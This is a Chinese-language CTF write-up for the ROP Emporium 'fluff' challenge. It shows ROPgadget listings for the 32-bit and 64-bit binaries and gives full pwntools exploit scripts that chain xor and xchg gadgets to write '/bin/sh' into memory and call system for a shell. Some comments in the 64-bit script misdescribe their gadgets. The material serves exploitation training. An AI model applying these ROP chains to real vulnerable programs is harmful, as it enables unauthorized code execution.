题目的设置跟前面的题还是一样没什么变化,查一波gadget,会发现在这次的写入没之前的那么顺利
$ ROPgadget --binary ./fluff32 --only "mov|pop|ret|xor|xchg"
Gadgets information
============================================================
0x08048547 : mov al, byte ptr [0xc9010804] ; ret
0x08048709 : mov dword ptr [0x81fffffd], eax ; ret
0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x08048674 : mov ebp, 0xcafebabe ; ret
0x080484b0 : mov ebx, dword ptr [esp] ; ret
0x0804867e : mov edi, 0xdeadbabe ; ret
0x0804868c : mov edx, 0xdefaced0 ; ret
0x0804867d : pop ebp ; mov edi, 0xdeadbabe ; ret
0x0804868b : pop ebp ; mov edx, 0xdefaced0 ; ret
0x08048695 : pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080486fb : pop ebp ; ret
0x080486f8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080483e1 : pop ebx ; ret
0x08048696 : pop ebx ; xor byte ptr [ecx], bl ; ret
0x08048692 : pop edi ; mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
0x080486fa : pop edi ; pop ebp ; ret
0x08048670 : pop edi ; xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
0x08048673 : pop esi ; mov ebp, 0xcafebabe ; ret
0x080486f9 : pop esi ; pop edi ; pop ebp ; ret
0x0804867a : pop esi ; xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x080483ca : ret
0x080484fe : ret 0xeac1
0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
0x08048697 : xor byte ptr [ecx], bl ; ret
0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
Unique gadgets found: 26
因为没有mov可以直接写入,这里我们可以用xor进行写入操作,用一个xor操作清空寄存器A,再通过 xor A,B就可以将B寄存器的内容写入到寄存器A中去。这道题就是巧秒得利用了xor来进行写入。
exp:
# -*- coding:UTF-8 -*-
from pwn import *
context.log_level = "debug"
sh = process('./fluff32')
binsh = "/bin/sh\x00"
system_plt = 0x08048430
data_addr = 0x0804A028
#mov_ecx_edx;pop_ebp;pop_ebx;xor_ecx_bl;ret
gadget1 = 0x08048693
#xor_edx_edx;pop_esi;mov_ebp_0xcafebabe;ret 亦或自身
gadget2 = 0x08048671
#xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
gadget3 = 0x0804867b
pop_ebx = 0x080483e1
#xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
gadget4 = 0x08048689
junk = "A" * 4
payload = ""
payload += 0x28 * "A" + junk
payload += p32(gadget2) + p32(0) #xor_edx_edx (edx = 0)
payload += p32(pop_ebx) + p32(data_addr)
payload += p32(gadget3) + p32(0) #(edx = data_addr,pop_ebp,mov)
payload += p32(gadget4) + p32(0) #ecx = data_addr
payload += p32(pop_ebx)
payload += "/bin"
payload += p32(gadget2) + p32(0) #xor_edx_edx (edx = 0)
payload += p32(gadget3) + p32(0) #(edx = "/bin",pop_ebp,mov)
#"/bin"放到data中去
payload += p32(gadget1) + p32(0) + p32(0)
payload += p32(pop_ebx) + p32(data_addr + 4)
payload += p32(gadget2) + p32(0) #xor_edx_edx (edx = 0)
payload += p32(gadget3) + p32(0) #(edx = data_addr,pop_ebp,mov)
payload += p32(gadget4) + p32(0) #ecx = data_addr + 4
payload += p32(pop_ebx)
payload += "/sh\x00"
payload += p32(gadget2) + p32(0) #xor_edx_edx (edx = 0)
payload += p32(gadget3) + p32(0) #(edx = "/bin",pop_ebp,mov)
#"xsh\x00"放到data中去
payload += p32(gadget1) + p32(0) + p32(0)
payload += p32(system_plt) + p32(0) + p32(data_addr)
sh.sendline(payload)
sh.interactive()
64位程序 :
这里需要注意一下在查gadget的时候,可能会出现找不到想要的gadget,可以加上参数 --depth 20,(20是深度最深的情况了)
$ ROPgadget --binary fluff --only "mov|pop|ret|xor|xchg" --depth 20
Gadgets information
============================================================
0x0000000000400713 : mov byte ptr [rip + 0x20096e], 1 ; ret
0x000000000040084f : mov dword ptr [rdx], ebx ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004007ae : mov eax, 0 ; pop rbp ; ret
0x0000000000400835 : mov ebp, 0x604060 ; ret
0x0000000000400846 : mov ebx, 0x602050 ; ret
0x0000000000400827 : mov edi, 0x601050 ; ret
0x000000000040083b : mov edi, 0x601050 ; xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x000000000040084e : mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400845 : mov r11d, 0x602050 ; ret
0x0000000000400834 : mov r13d, 0x604060 ; ret
0x0000000000400832 : pop r12 ; mov r13d, 0x604060 ; ret
0x00000000004008bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400853 : pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400851 : pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004008be : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400825 : pop r14 ; mov edi, 0x601050 ; ret
0x00000000004008c0 : pop r14 ; pop r15 ; ret
0x000000000040082d : pop r14 ; xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x000000000040084c : pop r15 ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400843 : pop r15 ; mov r11d, 0x602050 ; ret
0x00000000004008c2 : pop r15 ; ret
0x0000000000400820 : pop r15 ; xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400712 : pop rbp ; mov byte ptr [rip + 0x20096e], 1 ; ret
0x00000000004008bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400852 : pop rbp ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x00000000004008bf : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop rbp ; ret
0x00000000004008ba : pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040084d : pop rdi ; mov qword ptr [r10], r11 ; pop r13 ; pop r12 ; xor byte ptr [r10], r12b ; ret
0x0000000000400844 : pop rdi ; mov r11d, 0x602050 ; ret
0x00000000004008c3 : pop rdi ; ret
0x0000000000400821 : pop rdi ; xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400826 : pop rsi ; mov edi, 0x601050 ; ret
0x00000000004008c1 : pop rsi ; pop r15 ; ret
0x000000000040082e : pop rsi ; xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400833 : pop rsp ; mov r13d, 0x604060 ; ret
0x00000000004008bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400854 : pop rsp ; xor byte ptr [r10], r12b ; ret
0x00000000004005b9 : ret
0x0000000000400841 : xchg ebx, edx ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400840 : xchg r11, r10 ; pop r15 ; mov r11d, 0x602050 ; ret
0x0000000000400855 : xor byte ptr [r10], r12b ; ret
0x0000000000400856 : xor byte ptr [rdx], ah ; ret
0x0000000000400823 : xor ebx, ebx ; pop r14 ; mov edi, 0x601050 ; ret
0x0000000000400830 : xor ebx, esp ; pop r12 ; mov r13d, 0x604060 ; ret
0x0000000000400822 : xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
0x000000000040082f : xor r11, r12 ; pop r12 ; mov r13d, 0x604060 ; ret
Unique gadgets found: 47
exp:
from pwn import *
sh = process('./fluff')
binsh = "/bin/sh\x00"
system_plt = 0x00000000004005E0
data_addr = 0x0000000000601050
pop_rdi = 0x00000000004008c3
#mov r10, r11 ; pop r13 ; pop r12 ; xor r10, r12 ; ret
gadget1 = 0x000000000040084e
#pop r15 ; mov r10, r11 ; pop r13 ; pop r12 ; xor r10, r12 ; ret
gadget2 = 0x000000000040084c
#xor r11, r11 ; pop r14 ; mov edi, 0x601050 ; ret
gadget3 = 0x0000000000400822
#xor r11, r12 ; pop r12 ; mov r13, 0x604060 ; ret
gadget4 = 0x000000000040082f
#xchg r11, r10 ; pop r15 ; mov r11, 0x602050 ; ret
gadget5 = 0x0000000000400840
#pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
gadget6 = 0x00000000004008bc
payload = ""
payload += 0x20 * "A" + p64(0)
#将 data_addr 写入r10
payload += p64(gadget6) + p64(data_addr) +p64(3) + p64(4) + p64(5)
payload += p64(gadget3) + p64(4)
payload += p64(gadget4) + binsh
payload += p64(gadget5) + p64(5)
#将"/bin/sh\x00" 写入r11
payload += p64(gadget6) + binsh +p64(3) + p64(4) + p64(5)
payload += p64(gadget3) + p64(4)
payload += p64(gadget4) + binsh
#data_addr = "/bin/sh\x00"
payload += p64(gadget1) + p64(3) + p64(0)
payload += p64(pop_rdi) + p64(data_addr) + p64(system_plt)
sh.sendline(payload)
sh.interactive()